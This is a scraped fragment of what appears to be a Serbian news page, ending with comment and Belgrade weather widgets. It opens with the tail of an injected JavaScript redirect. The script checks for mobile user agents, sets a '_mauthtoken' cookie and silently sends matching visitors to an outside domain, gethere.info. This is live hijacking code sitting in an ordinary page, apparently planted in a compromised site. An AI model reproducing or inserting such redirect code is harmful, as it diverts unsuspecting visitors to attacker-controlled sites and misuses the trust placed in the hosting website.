)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

Komentari
Dodaj komentar
Close
Vremenska prognoza
mist
6°C
28.11.2021.
Beograd

Najnovije

Vidi sve

Najčitanije

Vidi sve